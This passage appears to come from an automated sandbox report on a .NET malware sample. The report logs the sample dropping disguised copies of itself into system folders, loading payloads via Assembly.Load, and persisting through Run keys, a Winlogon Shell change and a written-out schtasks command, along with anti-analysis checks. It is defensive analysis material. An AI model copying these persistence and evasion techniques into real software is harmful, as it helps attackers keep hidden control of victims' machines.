                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: mscoree.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: version.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: wldp.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: amsi.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: userenv.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: profapi.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: cryptsp.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: sspicli.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: mscoree.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: version.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: wldp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: amsi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: userenv.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: profapi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: Z4D3XAZ2jB.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Z4D3XAZ2jB.exe Static file information: File size 3163910 > 1048576
                    Source: Z4D3XAZ2jB.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: Z4D3XAZ2jB.exe, _.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: services.exe.0.dr, _.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: ZDtOzYsYYWKWEhNYzFc.exe.0.dr, _.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: ZDtOzYsYYWKWEhNYzFc.exe0.0.dr, _.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: ZDtOzYsYYWKWEhNYzFc.exe1.0.dr, _.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: ZDtOzYsYYWKWEhNYzFc.exe2.0.dr, _.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Code function: 0_2_00007FFD9B7600BD pushad ; iretd 0_2_00007FFD9B7600C1
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Code function: 0_2_00007FFD9B9167EC pushad ; iretd 0_2_00007FFD9B9167ED
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Code function: 0_2_00007FFD9B9B8AF4 push E8000000h; ret 0_2_00007FFD9B9B8AF9
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Code function: 0_2_00007FFD9B9B5CA1 push edi; iretd 0_2_00007FFD9B9B5CB6
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 16_2_00007FFD9B7AEE7E push ebp; iretd 16_2_00007FFD9B7AEE80
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 16_2_00007FFD9B7D9803 push eax; iretd 16_2_00007FFD9B7D980D
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 16_2_00007FFD9B7DC74C pushad ; retf 16_2_00007FFD9B7DC74D
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 16_2_00007FFD9B7D7567 push ebx; iretd 16_2_00007FFD9B7D756A
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 16_2_00007FFD9B7900BD pushad ; iretd 16_2_00007FFD9B7900C1
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 16_2_00007FFD9B884644 push ds; retf 16_2_00007FFD9B884662
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 16_2_00007FFD9B9467EC pushad ; iretd 16_2_00007FFD9B9467ED
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 16_2_00007FFD9B9E5CB0 push edi; iretd 16_2_00007FFD9B9E5CB6
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 16_2_00007FFD9BFE7BA3 push ecx; ret 16_2_00007FFD9BFE7BAC
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 19_2_00007FFD9B7D9803 push eax; iretd 19_2_00007FFD9B7D980D
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 19_2_00007FFD9B7DC74C pushad ; retf 19_2_00007FFD9B7DC74D
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 19_2_00007FFD9B7D7567 push ebx; iretd 19_2_00007FFD9B7D756A
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 19_2_00007FFD9B7900BD pushad ; iretd 19_2_00007FFD9B7900C1
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 19_2_00007FFD9B7AEE7E push ebp; iretd 19_2_00007FFD9B7AEE80
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Code function: 20_2_00007FFD9B7B9803 push eax; iretd 20_2_00007FFD9B7B980D
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Code function: 20_2_00007FFD9B7BC74C pushad ; retf 20_2_00007FFD9B7BC74D
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Code function: 20_2_00007FFD9B7700BD pushad ; iretd 20_2_00007FFD9B7700C1
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Code function: 22_2_00007FFD9B7700BD pushad ; iretd 22_2_00007FFD9B7700C1
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Code function: 24_2_00007FFD9B7500BD pushad ; iretd 24_2_00007FFD9B7500C1
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 25_2_00007FFD9B7900BD pushad ; iretd 25_2_00007FFD9B7900C1
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Code function: 28_2_00007FFD9B7B9803 push eax; iretd 28_2_00007FFD9B7B980D
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Code function: 28_2_00007FFD9B7BC74C pushad ; retf 28_2_00007FFD9B7BC74D
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Code function: 28_2_00007FFD9B7700BD pushad ; iretd 28_2_00007FFD9B7700C1
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 31_2_00007FFD9B7B9803 push eax; iretd 31_2_00007FFD9B7B980D
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 31_2_00007FFD9B7BC74C pushad ; retf 31_2_00007FFD9B7BC74D
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 31_2_00007FFD9B7700BD pushad ; iretd 31_2_00007FFD9B7700C1
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Code function: 32_2_00007FFD9B7AEE7E push ebp; iretd 32_2_00007FFD9B7AEE80

                    Persistence and Installation Behavior

                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Windows\GameBarPresenceWriter\services.exe
                    Source: unknown Executable created and started: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe
                    Source: unknown Executable created and started: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                    Source: unknown Executable created and started: C:\Windows\GameBarPresenceWriter\services.exe
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\NPGqEfku.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\RbOZahUq.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\tWJuefum.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\rAXMkKSS.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\SYphwgjk.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\uUlCzfJh.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\rMnteNPl.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\lyXnXruh.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\MgNITBew.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\WPgYDdje.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\HkLrMVoC.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\UAeHorhP.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\wySLBGmi.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\hdUdukKE.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\dVPxoyeA.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\ADqcsYvZ.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\quZEfXkb.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\MoHhbGed.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\CNYkWNAB.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\wNAllcuf.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\YALoKruW.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\HtvJqEPI.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\oPsvdwHZ.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\hREwAhMk.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\OquQxqjY.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\eJTFZLay.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\CFoRreZv.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\GmHIOoGs.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\bCyXfazS.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\xbtTyUdE.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\DldKqVbv.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\fxzonGoL.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\yKbtGcJa.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\KInsUcJl.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\PFcqhLrW.log
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\klRmPCEz.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\ZeYGhBeG.log
                    Source: C:\Windows\GameBarPresenceWriter\services.exe File created: C:\Users\user\Desktop\qmplAoJV.log

                    Boot Survival

                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run services
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFc
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run services
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFc
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\GameBarPresenceWriter\services.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Memory allocated: 2580000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Memory allocated: 1A720000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Memory allocated: 23C0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Memory allocated: 1A3C0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Memory allocated: 2DE0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Memory allocated: 1ADE0000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 10D0000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 1ABD0000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 1350000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 1AEF0000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: FD0000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 1A8C0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Memory allocated: 2C10000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Memory allocated: 1AC10000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 1470000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 1AFF0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Memory allocated: 11D0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Memory allocated: 1B0A0000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: FD0000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 1AC00000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Memory allocated: 11E0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Memory allocated: 1ADA0000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 970000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 1A9B0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Memory allocated: 30E0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Memory allocated: 1B0E0000 memory reserve | memory write watch
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 1060000 memory reserve | memory write watch
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 1AC00000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 680000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 1A2F0000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: A70000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 1A5C0000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 740000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Memory allocated: 1A540000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Code function: 16_2_00007FFD9B9414D0 rdtsc 16_2_00007FFD9B9414D0
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 599875
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 598985
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 598844
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 598453
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 3600000
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 597688
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 597530
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 597406
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 597219
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 300000
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 597078
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 596953
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 596836
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 596672
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 596532
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 596391
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 596266
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 596141
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 596028
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 595922
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Thread delayed: delay time: 595813
